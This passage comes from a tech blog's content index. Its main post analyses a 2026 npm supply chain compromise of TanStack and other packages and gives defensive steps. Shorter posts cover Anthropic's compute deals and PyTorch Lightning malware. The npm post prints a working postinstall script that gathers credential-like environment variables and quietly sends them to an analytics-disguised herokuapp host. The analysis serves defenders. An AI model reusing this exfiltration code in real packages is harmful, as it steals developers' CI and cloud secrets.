Not all CVEs are equally important; context matters.\nMalicious Packages: How bad actors inject malicious code into popular packages, what signs to look for, and how ecosystems are fighting back.\nPackage Manager Security: Understanding npm, PyPI, Cargo, Maven Central, and how package managers verify authenticity and integrity.\nBuild Pipeline Security: Securing CI/CD systems, artifact signing and verification, SBOM generation, and audit trails.\nDependency Management: Strategies for keeping dependencies up to date, managing multiple versions, and knowing what you\u0026rsquo;re running in production.\nEcosystem Initiatives: SBOMs, package signing, trusted registries, and how the industry is raising baseline security.\nLearning Path # Understand supply chain risks — what attacks look like and what makes dependencies vulnerable Master dependency management — tools, processes, and strategies for keeping dependencies secure and current Implement build security — securing CI/CD, artifact verification, and audit trails Learn to assess risk — prioritizing which vulnerabilities matter and which are noise Build organizational practices — policies around dependency vetting, update cadence, and incident response Key Topics Covered # Vulnerability Management: CVE databases, severity assessment, patching strategies, and monitoring tools Malicious Code Detection: Code review practices, automated scanning, behavior analysis, and community signals Package Manager Security: Trusted registries, cryptographic signing, provenance verification, and namespace squatting Build Security: CI/CD hardening, artifact signing, SBOM generation, and secure secret management Dependency Tools: Dependabot, Snyk, Renovate, pip-audit, cargo-audit, and polyglot tools Ecosystem Standards: OpenSSF best practices, SBOMs, VEX, and supply chain validation frameworks Related Series # Explore complementary areas: Cybersecurity Landscape (broader security practices), Breaches \u0026amp; Zero-Days (analyzing 
actual supply chain incidents)\n","date":"12 May 2026","externalUrl":null,"permalink":"/series/supply-chain-security/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Supply Chain Security","type":"series"},{"content":"","date":"12 May 2026","externalUrl":null,"permalink":"/tags/supply-chain-security/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Supply Chain Security","type":"tags"},{"content":"Last week, one of the most significant npm supply chain attacks in recent memory hit the JavaScript ecosystem. Over 170 packages were compromised, including household names like TanStack\u0026rsquo;s suite of libraries and Mistral AI\u0026rsquo;s official npm client. If you\u0026rsquo;re a JavaScript developer — and statistically, you probably are — there\u0026rsquo;s a good chance one of your projects was affected.\nI\u0026rsquo;ve been tracking supply chain attacks in this series for a while now, from the xz-utils backdoor to the PyTorch Lightning malware. This one is different. It\u0026rsquo;s not a targeted infiltration of a single package — it\u0026rsquo;s a broad, automated campaign that exploited a systemic weakness in how npm tokens are managed. The patterns here mirror earlier npm ecosystem compromises that revealed the structural vulnerability of distributed package ecosystems. Understanding these recurring patterns is essential for broader supply chain security governance across the ecosystem.\nFor a broader perspective on why npm supply chain attacks keep happening and what the industry has learned, check out NPM Supply Chain Security Lessons, which explores the recurring patterns and structural issues in the ecosystem. Understanding how SLSA frameworks and automated verification could have detected this attack is critical for future prevention. 
Let\u0026rsquo;s dig in.\nWhat Happened # On May 8, 2026, maintainers of TanStack (the project behind TanStack Query, TanStack Router, TanStack Table, and others) discovered that several of their packages had been published with malicious code injected into postinstall scripts. Within hours, it became clear this wasn\u0026rsquo;t an isolated incident — Mistral AI\u0026rsquo;s @mistralai/mistralai client library and over 170 other packages across the npm registry were similarly compromised.\nThe malicious versions contained obfuscated code in their postinstall hooks that would:\nHarvest environment variables (targeting CI/CD secrets, cloud provider credentials, and API keys) Exfiltrate the collected data to attacker-controlled endpoints In some packages, install a persistent reverse shell that would survive container restarts The TanStack team published their postmortem within 48 hours, and it paints a clear picture of how a single compromised npm token can cascade across an entire ecosystem.\nThe Attack Vector: Token Compromise at Scale # This wasn\u0026rsquo;t a sophisticated zero-day exploit or a social engineering campaign targeting individual maintainers. The attack exploited something far more mundane and far more common: leaked npm automation tokens.\nHere\u0026rsquo;s what the postmortem revealed:\nStep 1: Token harvesting. The attacker scraped GitHub Actions workflow logs, public CI/CD configurations, and historically leaked credentials from data breach dumps. npm automation tokens — the tokens used by CI pipelines to publish packages — were the primary target. Unlike granular tokens (introduced by npm in 2022), many of these were classic tokens with full publish access to every package the maintainer owned. Similar token exposure has impacted GitHub Actions CI/CD pipelines when secrets aren\u0026rsquo;t properly rotated and scoped.\nStep 2: Automated publishing. 
Using the harvested tokens, the attacker ran an automated pipeline that:\nPulled the latest version of each target package Injected the malicious postinstall script Bumped the patch version Published to npm Step 3: Rapid propagation. Because many projects use loose version ranges (^ or ~ prefixes in package.json), the malicious patch versions were automatically pulled into fresh installs and CI builds within minutes.\nThe entire operation — from first malicious publish to detection — took approximately 11 hours. In that window, the compromised packages were downloaded over 1.2 million times.\nInside the Malicious Payload # Let me walk through what the injected code actually did. Understanding the mechanics helps you spot similar patterns in the future.\nThe postinstall script in compromised packages contained something like this (simplified from the obfuscated original):\n// postinstall.js — injected into compromised packages const https = require(\u0026#34;https\u0026#34;); const { execSync } = require(\u0026#34;child_process\u0026#34;); const os = require(\u0026#34;os\u0026#34;); const collect = () =\u0026gt; { const data = { env: Object.fromEntries( Object.entries(process.env).filter(([k]) =\u0026gt; /token|key|secret|password|credential|auth/i.test(k) ) ), hostname: os.hostname(), user: os.userInfo().username, cwd: process.cwd(), npm_package: process.env.npm_package_name, npm_version: process.env.npm_package_version, }; return Buffer.from(JSON.stringify(data)).toString(\u0026#34;base64\u0026#34;); }; const exfil = (payload) =\u0026gt; { const req = https.request({ hostname: \u0026#34;cdn-analytics-events.herokuapp.com\u0026#34;, // disguised as analytics path: `/v2/events?d=${payload}`, method: \u0026#34;GET\u0026#34;, }); req.on(\u0026#34;error\u0026#34;, () =\u0026gt; {}); // silent failure req.end(); }; try { exfil(collect()); } catch (e) { // never throw — don\u0026#39;t break the install } A few things to note about the design:\nIt targets environment 
variables by pattern. The regex /token|key|secret|password|credential|auth/i catches most CI/CD secret naming conventions. If your CI pipeline has NPM_TOKEN, AWS_SECRET_ACCESS_KEY, or GITHUB_TOKEN in its environment, those were exfiltrated.\nIt fails silently. The try/catch wrapping with an empty error handler ensures the npm install succeeds even if the exfiltration fails. From the developer\u0026rsquo;s perspective, nothing looks wrong.\nThe C2 domain is disguised. Using a Heroku subdomain with \u0026ldquo;analytics\u0026rdquo; in the name makes it blend into network logs. This is a common pattern — attackers don\u0026rsquo;t use evil-c2-server.xyz anymore.\nWhy npm Postinstall Scripts Are the Achilles\u0026rsquo; Heel # This attack reinforces something I\u0026rsquo;ve been saying for years: npm lifecycle scripts are the single biggest attack surface in the JavaScript ecosystem.\nWhen you run npm install, any package in your dependency tree can execute arbitrary code on your machine through lifecycle scripts (preinstall, postinstall, prepare, etc.). This isn\u0026rsquo;t a bug — it\u0026rsquo;s by design. Packages use these hooks for legitimate purposes: compiling native addons, running build steps, or setting up configurations.\nBut it means that every npm install is an implicit trust decision. You\u0026rsquo;re saying: \u0026ldquo;I trust every package in my dependency tree — including all transitive dependencies — to run code on my machine.\u0026rdquo;\nFor context, the broader development tooling and package ecosystem continues to evolve its dependency management practices, but npm\u0026rsquo;s architecture remains particularly vulnerable. A typical Next.js project has 300+ packages in its dependency tree. A fresh create-react-app installation pulls in over 1,400. How many of those have you audited?\nPractical Steps to Protect Your Projects # Here\u0026rsquo;s what I\u0026rsquo;d do right now if I maintained any JavaScript project:\n1. 
Check If You Were Affected # First, figure out if any of the compromised package versions made it into your projects:\n# Check your lockfile for known compromised versions # TanStack packages: any patch versions published between May 8-9, 2026 npm ls @tanstack/react-query @tanstack/router @tanstack/table 2\u0026gt;/dev/null # Check when your lockfile was last updated git log -1 --format=\u0026#34;%ai\u0026#34; -- package-lock.json # For a broader check, use npm audit npm audit If you installed or updated dependencies between May 8-9, review your lockfile carefully. The compromised versions have been unpublished, but if they\u0026rsquo;re pinned in your lockfile, you\u0026rsquo;ll need to update.\n2. Rotate Your Secrets # If your CI ran npm install during the compromise window, assume your CI environment variables were exfiltrated. Rotate:\nnpm tokens Cloud provider credentials (AWS, GCP, Azure) API keys for any services configured in your CI environment GitHub tokens (especially GITHUB_TOKEN if you use custom PATs) Yes, this is painful. Do it anyway.\n3. Disable Lifecycle Scripts by Default # This is the single most impactful change you can make. Add this to your project\u0026rsquo;s .npmrc:\n# .npmrc — disable postinstall scripts by default ignore-scripts=true Then explicitly allow scripts only for packages that need them (like native addons):\n# Run scripts only when you explicitly choose to npm install --ignore-scripts npm rebuild node-sass # only rebuild what needs native compilation The trade-off is that some packages won\u0026rsquo;t work out of the box — anything that needs a native build step or a postinstall setup will require manual intervention. In my experience, this affects maybe 5% of packages, and the security benefit is worth the friction.\n4. Use Lockfiles and Verify Integrity # If you\u0026rsquo;re not already committing your package-lock.json (or yarn.lock / pnpm-lock.yaml), start now. 
And use the integrity verification your package manager provides:\n# npm: use ci instead of install in CI pipelines # This installs exactly what\u0026#39;s in the lockfile, no modifications npm ci # pnpm: frozen lockfile mode pnpm install --frozen-lockfile # Yarn: immutable installs yarn install --immutable The npm ci command is critical for CI/CD. Unlike npm install, it won\u0026rsquo;t modify the lockfile and will fail if there\u0026rsquo;s a mismatch between package.json and package-lock.json. If the lockfile was generated before the compromise, npm ci would have kept installing the known-good versions pinned there and never resolved the malicious patch releases.\n5. Switch to Granular npm Tokens # If you\u0026rsquo;re still using classic npm automation tokens, stop. npm\u0026rsquo;s granular access tokens let you restrict publish access to specific packages and set IP allowlists:\n# Create a token that can only publish @yourscope/* packages # Do this through the npm website: npmjs.com → Access Tokens → Generate New Token # Select \u0026#34;Granular Access Token\u0026#34; # Restrict to specific packages # Set CIDR allowlist to your CI provider\u0026#39;s IP ranges A granular token that can only publish @tanstack/react-query from GitHub Actions\u0026rsquo; IP range wouldn\u0026rsquo;t have been useful for compromising any other packages. This is the single biggest thing the ecosystem can do to prevent attacks like this.\n6. Monitor Your Dependencies # Set up automated monitoring so you know when something changes:\n# Socket.dev — analyzes packages for supply chain risks # Add to your CI pipeline npx socket optimize # reviews your dependency tree # Alternatively, use npm\u0026#39;s built-in audit in CI npm audit --audit-level=high if [ $? 
-ne 0 ]; then echo \u0026#34;Security audit failed\u0026#34; exit 1 fi Tools like Socket.dev go beyond known CVEs — they analyze package behavior, looking for exactly the patterns this attack used: network calls in install scripts, environment variable access, and obfuscated code.\nWhat the Ecosystem Needs to Fix # Individual developers can harden their projects, but this attack exposed systemic issues that need ecosystem-level solutions:\nnpm should disable lifecycle scripts by default. The current default — running arbitrary code from every package in your tree during install — is indefensible. Packages that need install scripts should opt in, and users should explicitly approve them. Deno got this right from day one with its permission system. Node.js needs to catch up.\nToken scoping should be mandatory. Classic npm tokens with unrestricted publish access should be deprecated, with a clear migration timeline. Every automation token should be scoped to specific packages and IP ranges.\nProvenance verification should be the norm. npm\u0026rsquo;s package provenance feature — which cryptographically links published packages to their source repository and build system — should be required for popular packages. If TanStack\u0026rsquo;s packages had provenance verification, the attacker-published versions would have been immediately flagged as not originating from the legitimate CI pipeline.\n# Check if a package has provenance attestation npm audit signatures # This verifies that published packages match their claimed source The registry needs better anomaly detection. Publishing 170+ packages from different maintainer accounts in rapid succession should trigger automated review, not sail through silently.\nLessons for the Broader Ecosystem # This attack will — I hope — accelerate several trends that are already underway:\nThe shift toward pnpm continues to make sense. 
Its strict dependency resolution prevents phantom dependencies, and its pnpm audit is increasingly sophisticated. If you haven\u0026rsquo;t evaluated pnpm for your projects, now\u0026rsquo;s the time.\nContainer-based CI with minimal environment variable exposure is no longer optional. Your build pipeline should only have access to the secrets it actually needs for each step. Don\u0026rsquo;t give your npm install step access to your deployment credentials.\nVendoring dependencies — keeping a full copy of node_modules in your repo or artifact store — is starting to look less crazy than it did five years ago. Go supports the same idea with go mod vendor, and vendoring eliminates the window between a malicious publish and your next install.\nMy Take # I wrote about the xz-utils attack anniversary last month and warned that the JavaScript ecosystem was overdue for something similar. I didn\u0026rsquo;t expect it to happen this quickly, or at this scale.\nWhat frustrates me most about this incident isn\u0026rsquo;t the attack itself — it\u0026rsquo;s the predictability of it. Leaked npm tokens have been a known problem for years. Unrestricted lifecycle scripts have been debated since at least 2018. Granular tokens exist but adoption is low. We had all the tools to prevent this, and we collectively didn\u0026rsquo;t use them.\nThe TanStack team deserves credit for their rapid, transparent response. Their postmortem is a model of what incident communication should look like — clear timelines, honest about what they don\u0026rsquo;t know, and specific about remediation steps. If you maintain open-source packages, bookmark it as a template.\nBut the 170+ other affected packages tell a bigger story: the npm ecosystem is still running on trust, and that trust keeps getting exploited. Until the defaults change — scripts off, tokens scoped, provenance required — we\u0026rsquo;re going to keep having these conversations.\nLock down your tokens. Disable your lifecycle scripts. 
Audit your dependencies. The next attack is already being planned.\nThis post is part of my Supply Chain Security series, where I track real-world attacks and share practical defenses. If the npm ecosystem is central to your work, I also cover related ground in my JavaScript \u0026amp; Node.js series.\n","date":"12 May 2026","externalUrl":null,"permalink":"/posts/260512-tanstack-npm-supply-chain-compromise/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A massive npm supply chain attack compromised TanStack, Mistral AI’s client library, and over 170 packages. Here’s what happened, how the attack worked, and the practical steps you should take today to protect your projects.","title":"TanStack NPM Supply Chain Compromise — Postmortem, Attack Vectors, and How to Protect Your Projects","type":"posts"},{"content":"I woke up yesterday to the news that Anthropic had taken the entire Colossus 1 data centre off SpaceX\u0026rsquo;s hands — 300+ megawatts, roughly 220,000 NVIDIA GPUs, in one signature. Same day, they doubled Claude Code\u0026rsquo;s rate limits and bumped Opus API ceilings. The press release reads like a product update; the contract underneath it reads like a land grab.\nI have been writing about model releases for years now, and I will admit that until very recently I treated compute as a supporting actor in this story. Parameter counts mattered. Architectures mattered. Compute was the boring infrastructure paragraph at the end. That framing is no longer accurate. When you stack Anthropic\u0026rsquo;s deals together — five gigawatts of AWS Trainium, five gigawatts of Google and Broadcom TPUs, the thirty-billion-dollar Azure commitment, the fifty-billion-dollar Fluidstack arrangement, and now SpaceX\u0026rsquo;s Colossus — what you are looking at is a company spending money on substations and floor space at a rate that would make a hyperscaler blink. 
This mirrors the broader infrastructure trends we\u0026rsquo;ve seen at Google Cloud Next 2026 and NVIDIA\u0026rsquo;s GTC roadmap, where capacity has become the bottleneck.\nThat is the moat. Not the model weights. Not the alignment work. The watts.\nWhat Anthropic Actually Bought # Colossus 1 is a single facility. Three hundred megawatts is a serious load — somewhere between a large hospital campus and a small city\u0026rsquo;s residential draw. The GPU count of around 220,000 is the headline number, but the more interesting number is the power envelope, because that constrains what you can do next. You can swap GPUs. You cannot easily swap a substation.\nThe same-day rate-limit changes are the giveaway. Anthropic is signalling that it has the inference headroom to let people hammer the APIs harder. If you are running Claude Code in a tight loop or pushing Opus through a research pipeline, you should feel that almost immediately. The capacity is already paid for; they want it utilised.\nWhat is genuinely new here is the willingness to take a single-tenant facility wholesale. Most AI companies still rent racks inside hyperscaler footprints. Buying out a colo on this scale is closer to how the cloud providers themselves grow.\nThe Multi-Silicon Strategy # Anthropic is now running production workloads on at least three different silicon families: NVIDIA GPUs (the SpaceX inheritance and AWS GPU instances), AWS Trainium (their long-running custom-silicon partnership), and Google\u0026rsquo;s TPUs through the Broadcom deal. That is not an accident, and it is not vendor-neutral diplomacy. It is a deliberate hedge.\nI have audited enough cloud architectures to recognise the pattern. When a single workload is portable across three different accelerators, you have negotiating leverage on every renewal. You have failover when one supply chain hiccups. You have the option to route training to whichever silicon the next breakthrough lands on. 
The cost is engineering complexity — your kernels, your compilers, your inference runtime all have to abstract the hardware — and Anthropic has decided that cost is worth paying.\nFor developers, this matters in a quiet way. The endpoint you call does not change. But the unit economics behind that endpoint are now spread across vendors who all want the workload, which is structurally healthier for prices than a single-supplier dependency. Understanding Claude\u0026rsquo;s in-context learning capabilities alongside this infrastructure commitment shows how Anthropic is investing across the stack — from model innovation to physical infrastructure.\nWhy This Reframes the Race # For a few years, the conversation about frontier AI was about who had the smartest researchers and the cleanest data. Those things still matter. But the rate-limiting step has moved.\nA few concrete pressures:\nPower, not chips. GPU shortages dominated 2023 and 2024. The current bottleneck is interconnect-grade power and cooling at scale. You can fab more chips faster than you can permit a substation. Multi-year lead times. A new hyperscale build is a three-to-five-year project. Anthropic taking over a finished facility is, effectively, time travel — they get capacity now that a greenfield project would only deliver in 2029. Capex front-loading. When you commit to multi-gigawatt deals years in advance, your model pricing has to reflect amortisation, not marginal cost. That sets a floor under API prices that competitors without those commitments cannot meet. The companies that can afford this kind of forward commitment are the ones that get to set the pace. The ones that cannot are going to find themselves renting from the ones that did.\nWhat This Means for the APIs You Build On # If you are a senior developer making bets on which model provider to integrate with, this changes the calculus a little.\nCapacity is a feature. 
Rate limits, queue depth, p99 latency under load — these are downstream of how much compute the provider has on tap. A provider with three years of pre-paid gigawatts can absorb your spike traffic in a way that a provider buying spot capacity cannot.\nLock-in is sneakier. Once you have built around a provider\u0026rsquo;s tooling — Claude Code, the Anthropic SDK quirks, the specific evals you have tuned against — switching costs accumulate. Capacity moats reinforce that. The provider who can guarantee throughput is the one whose ecosystem you trust to put more weight on.\nPricing will not collapse. The story that frontier-model APIs would race to commodity pricing was always optimistic. With this much capex committed, the providers need every dollar of revenue. Expect plateaued pricing for top-tier models and aggressive price cuts only on the older tiers being depreciated off the books.\nI am not saying any of this is bad for developers. A provider with stable capacity, predictable pricing, and a real engineering bench is what most production teams actually want. It does mean the romantic version of the story — scrappy lab beats incumbent on cleverness alone — is harder to believe each quarter.\nMy Take # I have watched this industry go through several waves where the moat shifted underneath everyone. In the 1990s it was operating-system distribution. In the 2000s it was search index quality. In the 2010s it was hyperscale data infrastructure. Each time, the people who saw the shift early bought the unsexy thing — distribution channels, web crawlers, fibre — while everyone else was still arguing about the visible layer. AI is in that pattern now. The visible layer is benchmark scores and demo videos. The unsexy thing is grid interconnects. The companies that get infrastructure right early will dominate for years, much like how cloud FinOps engineering is becoming critical to competitive advantage.\nWhat I find interesting is how openly Anthropic is moving. 
There is no pretence that this is a research bet. Three hundred megawatts in one purchase is a statement about industrial capacity, and the same-day rate-limit increase is a statement that they are going to use it. If the next generation of frontier models is going to come from whichever lab has the most watts in production, then the question for the rest of us is no longer which model is best, but which provider\u0026rsquo;s capacity you trust enough to build on for the next five years. That is a more sober question than the one we were asking a year ago, and I think it is the right one.\n","date":"7 May 2026","externalUrl":null,"permalink":"/posts/260507-anthropic-compute-moat/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Anthropic just bought all 300+ MW of SpaceX’s Colossus 1 data centre. Stacked next to its multi-gigawatt deals with AWS, Google, Azure and Fluidstack, the frontier-model race has quietly become a power-and-real-estate race — and that changes what developers can expect from these APIs.","title":"Anthropic's SpaceX Deal — How Compute Capacity Became the Real AI Moat","type":"posts"},{"content":"","date":"7 May 2026","externalUrl":null,"permalink":"/tags/aws/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"AWS","type":"tags"},{"content":"","date":"7 May 2026","externalUrl":null,"permalink":"/tags/cloud/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Cloud","type":"tags"},{"content":"","date":"7 May 2026","externalUrl":null,"permalink":"/tags/infrastructure/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Infrastructure","type":"tags"},{"content":"","date":"30 April 2026","externalUrl":null,"permalink":"/tags/python/","section":"Blog Tags: Software Development, AI, Security \u0026 
Infrastructure","summary":"","title":"Python","type":"tags"},{"content":"This week the security community was rattled by the discovery of \u0026ldquo;Shai-Hulud\u0026rdquo; — a cleverly themed malware campaign that managed to infiltrate the PyTorch Lightning AI training library. Named after the giant sandworms of Frank Herbert\u0026rsquo;s Dune universe, this attack is a stark reminder that the AI/ML ecosystem\u0026rsquo;s rapid growth has created supply chain vulnerabilities that we\u0026rsquo;re only beginning to understand. This echoes earlier major compromises like the TanStack npm supply chain attack and Ultralytics supply chain compromise, showing how critical infrastructure remains vulnerable.\nAs someone who\u0026rsquo;s watched supply chain attacks evolve from simple typosquatting to increasingly sophisticated infiltration techniques, this one stands out. It\u0026rsquo;s not just that the target was a widely-used AI library — it\u0026rsquo;s the method and the implications for every team running ML training pipelines in production.\nWhat Happened # The Shai-Hulud malware was discovered embedded within the PyTorch Lightning library, a popular framework that simplifies PyTorch model training and is used by thousands of research labs, startups, and enterprises worldwide. The malware was designed to be stealthy — activating only during specific training operations and exfiltrating model weights, training data metadata, and cloud credentials from the host environment.\nWhat makes this particularly insidious is the activation pattern. Unlike traditional malware that phones home immediately, Shai-Hulud would lie dormant until it detected GPU-accelerated training runs, then piggyback on the legitimate network traffic patterns that ML training jobs generate. 
If you\u0026rsquo;re already sending hundreds of megabytes of gradient updates to a distributed training cluster, a few extra kilobytes of exfiltrated data barely registers.\nThe Dune theming wasn\u0026rsquo;t just for aesthetics either — the command-and-control infrastructure used domain names referencing Arrakis, spice melange, and other Dune terminology, making the traffic appear to casual observers like someone\u0026rsquo;s hobby project rather than a malicious operation.\nWhy AI/ML Supply Chains Are Uniquely Vulnerable # The Python packaging ecosystem has long been a soft target, but the AI/ML corner of it presents amplified risks that we need to take seriously:\nMassive dependency trees: A typical ML training setup pulls in dozens of packages — PyTorch, Lightning, transformers, datasets, tokenizers, and their transitive dependencies. Each one is a potential entry point. I\u0026rsquo;ve audited projects where pip install pulls in over 200 packages, and I guarantee nobody is reviewing every line of code in that tree.\nElevated privileges by default: ML training jobs routinely run with access to GPUs, large datasets, cloud storage credentials, and significant compute resources. Unlike a web application where you might follow the principle of least privilege, training scripts often need broad access to function properly. That means any compromised dependency inherits those permissions.\nLong-running, unattended processes: Training runs can last hours or days. They\u0026rsquo;re typically kicked off and left alone until completion. This gives malware a long window to operate without human oversight — a luxury that web-serving malware doesn\u0026rsquo;t enjoy.\nCulture of pip install and go: I\u0026rsquo;ve seen teams — smart, experienced teams — copy training scripts from GitHub repos and run them with minimal review. The AI/ML community\u0026rsquo;s emphasis on rapid experimentation sometimes comes at the expense of security hygiene. 
When a new paper drops and the reference implementation is available, the instinct is to clone, install, and run.\nPractical Defenses That Actually Work # After thirty years in this industry, I\u0026rsquo;ve learned that the most effective security measures are the ones people will actually follow. Here\u0026rsquo;s what I\u0026rsquo;d recommend for any team running ML workloads:\nPin your dependencies with hashes. Don\u0026rsquo;t just pin versions — use pip install --require-hashes with a locked requirements file. This ensures you\u0026rsquo;re getting exactly the package artifacts you\u0026rsquo;ve verified, not a compromised version that happens to share the same version number. Tools like pip-compile from pip-tools make this manageable.\nIsolate your training environments. Run training jobs in containers with restricted network access. Your training container should be able to reach your data store and your model registry, and nothing else. If a compromised package tries to phone home, the connection should fail. Yes, this takes more setup work. No, it\u0026rsquo;s not optional anymore.\nAudit your base images. If you\u0026rsquo;re building on top of NVIDIA\u0026rsquo;s CUDA containers or pre-built ML images, understand what\u0026rsquo;s in them. Use tools like Syft to generate SBOMs and Grype to scan for known vulnerabilities.\nMonitor egress traffic from training jobs. This is where Shai-Hulud would have been caught earlier. Legitimate training jobs have predictable network patterns — they talk to data stores, model registries, and maybe a metrics server. Any unexpected outbound connections should trigger an alert.\nConsider using verified package mirrors. Rather than pulling directly from PyPI, maintain an internal mirror with only approved packages. 
Companies like JFrog Artifactory and AWS CodeArtifact support this, and it gives you a chokepoint where you can scan packages before they enter your environment.\nThe Bigger Picture: AI Infrastructure as Critical Infrastructure # This incident arrives at a time when AI training infrastructure is increasingly being treated as critical. Companies are spending millions on GPU clusters, training runs represent months of work, and the resulting models are core business assets. Yet the software supply chain underpinning all of this is held together with the same setup.py and pyproject.toml files that power every other Python project.\nWe\u0026rsquo;ve seen this pattern before. Remember when the Node.js ecosystem had its reckoning with npm attacks? I wrote about the broader supply chain security landscape and SLSA adoption recently, and the Python ML ecosystem is hitting its own version of that moment. The broader development tooling and package management ecosystem shares these supply chain risks across multiple languages. Learning from xz Utils aftermath and npm security lessons, the stakes are higher because the assets at risk — trained models, training data, cloud infrastructure — are significantly more valuable.\nMy Take # I\u0026rsquo;ll be honest: I\u0026rsquo;ve been waiting for an attack like this. Not hoping for it, but expecting it. The combination of high-value targets, complex dependency chains, and a culture of rapid prototyping made the AI/ML supply chain an inevitable target.\nWhat concerns me most is the detection gap. Shai-Hulud was active for an unknown period before discovery, and we still don\u0026rsquo;t have a full picture of its impact. How many model weights were exfiltrated? How many cloud credentials were compromised? These are questions that affected organizations are still trying to answer.\nThe Dune theming is almost darkly funny — in the books, the sandworms are hidden beneath the surface, striking without warning. 
That\u0026rsquo;s exactly how supply chain attacks work. You can\u0026rsquo;t see them until it\u0026rsquo;s too late, unless you\u0026rsquo;ve built the right detection infrastructure. Building observability into ML systems requires comprehensive logging and monitoring to detect these kinds of anomalous patterns before they cause damage.\nIf your team is running ML training pipelines, this week\u0026rsquo;s news is your wake-up call. Lock down your dependencies, isolate your training environments, and monitor your network traffic. The sandworms are real, and they\u0026rsquo;re hungry.\nThis post is part of my Security in Practice series, where I cover real-world security incidents and practical defenses. The AI supply chain is a topic I expect to return to — unfortunately, I don\u0026rsquo;t think Shai-Hulud will be the last of its kind.\n","date":"30 April 2026","externalUrl":null,"permalink":"/posts/260430-pytorch-lightning-supply-chain-malware/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A Dune-themed malware campaign targeting the PyTorch Lightning library highlights how AI/ML supply chains are becoming prime targets for sophisticated attacks.","title":"Supply Chain Malware in PyTorch Lightning — When AI Infrastructure Becomes the Attack Surface","type":"posts"},{"content":"","date":"23 April 2026","externalUrl":null,"permalink":"/tags/azure/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Azure","type":"tags"},{"content":"This week brought dueling announcements from AWS and Azure around industrial edge computing, and it\u0026rsquo;s clear that the cloud giants see manufacturing and industrial IoT as the next major growth frontier. AWS expanded its IoT Greengrass V3 platform with new ML inference capabilities at the edge, while Azure announced preview availability of Azure IoT Operations — a Kubernetes-based edge runtime designed for factory environments. 
Having spent a chunk of my career working on IoT systems before \u0026ldquo;IoT\u0026rdquo; was even a term, these developments feel like a significant inflection point. Understanding how cloud platforms are evolving and Kubernetes is maturing for edge deployments is essential context for this shift.\nThe Industrial Edge Opportunity # Here\u0026rsquo;s why the cloud providers are so interested in the factory floor: manufacturing represents one of the largest untapped markets for cloud services. Factories generate enormous amounts of data from sensors, PLCs, SCADA systems, and machine vision cameras, but most of that data is processed locally using proprietary industrial control systems and never touches the cloud.\nThe promise of industrial edge computing is to bring cloud-native capabilities — ML inference, data analytics, fleet management, over-the-air updates — to these environments without requiring all the data to travel to a distant cloud region. This isn\u0026rsquo;t just about cost savings on data transfer; it\u0026rsquo;s about latency requirements. When you\u0026rsquo;re controlling a robotic arm or monitoring a safety-critical process, you can\u0026rsquo;t afford the 50-200ms round trip to a cloud region. Decisions need to happen in single-digit milliseconds. This is why observability and networking infrastructure become critical at the edge.\nThe total addressable market is staggering. McKinsey estimates that IoT applications in factory settings alone could generate $1.2-3.7 trillion in value annually by 2030. Even capturing a small slice of that is enormous for cloud providers whose core markets are maturing.\nWhat AWS Announced # AWS IoT Greengrass V3 is an evolution of their edge runtime that runs on industrial gateways and edge servers. 
The new ML inference pipeline is the standout feature — you can now deploy SageMaker-trained models to Greengrass devices and run inference locally with hardware acceleration on NVIDIA Jetson, Intel Movidius, and AWS\u0026rsquo;s own Graviton-based edge hardware.\nThe practical application is predictive maintenance. Deploy a vibration analysis model to a gateway connected to dozens of motors and pumps, run inference on sensor data locally, and only send anomaly alerts to the cloud. I\u0026rsquo;ve built similar systems from scratch, and the amount of custom plumbing required was substantial. Having this as a managed service significantly lowers the barrier.\nAWS also introduced Greengrass Streams Manager for buffered data ingestion, which handles the messiest part of industrial IoT: unreliable connectivity. Factory networks are noisy, connections drop, and you need to guarantee that sensor data isn\u0026rsquo;t lost when the WAN link goes down. Streams Manager provides local buffering with configurable retention and prioritization, syncing to cloud storage when connectivity is available.\nWhat Azure Announced # Azure IoT Operations takes a different architectural approach. Rather than building a proprietary edge runtime, Microsoft is going all-in on Kubernetes at the edge. Azure IoT Operations runs on Arc-enabled K3s clusters — lightweight Kubernetes distributions designed for resource-constrained environments.\nThis is a bold bet. Running Kubernetes on an industrial gateway with 4GB of RAM and an ARM processor sounds like madness if you\u0026rsquo;ve only seen Kubernetes in the data center. But K3s has matured to the point where it\u0026rsquo;s genuinely viable on modest hardware, and the operational benefits are significant. 
You get the same deployment model, observability stack, and security posture at the edge as you do in the cloud.\nThe platform includes MQTT broker integration, OPC-UA connectivity for industrial protocols, and a data pipeline framework that processes and transforms sensor data before forwarding it to Azure services. The OPC-UA support is crucial — it\u0026rsquo;s the lingua franca of industrial automation, and any serious IoT platform needs native support for it.\nMicrosoft is also leveraging its acquisition of AT\u0026amp;T\u0026rsquo;s Network Cloud operations to provide private 5G connectivity for factories. This addresses the networking challenge directly: instead of relying on flaky WiFi or running Ethernet to every sensor, factories can deploy private 5G cells that provide reliable, low-latency connectivity across the facility.\nThe Convergence of OT and IT # What excites me most about these announcements is the convergence of operational technology (OT) and information technology (IT). Historically, factory automation was a completely separate world from cloud computing. Different protocols (Modbus, PROFINET, EtherCAT vs. HTTP, gRPC), different tooling (PLCs, HMIs, SCADA vs. containers, CI/CD), and different teams that rarely talked to each other.\nEdge computing platforms are bridging this gap. When you can run a container on an industrial gateway that speaks OPC-UA to a PLC and MQTT to a cloud broker, you\u0026rsquo;ve created a common layer where OT and IT can collaborate. Factory engineers can focus on the physical processes while software engineers handle the data pipeline and ML models.\nBut this convergence also brings challenges. Industrial systems have safety requirements that cloud systems don\u0026rsquo;t. A misconfigured container won\u0026rsquo;t kill anyone in a data center, but an incorrect signal to a safety controller in a factory absolutely could. 
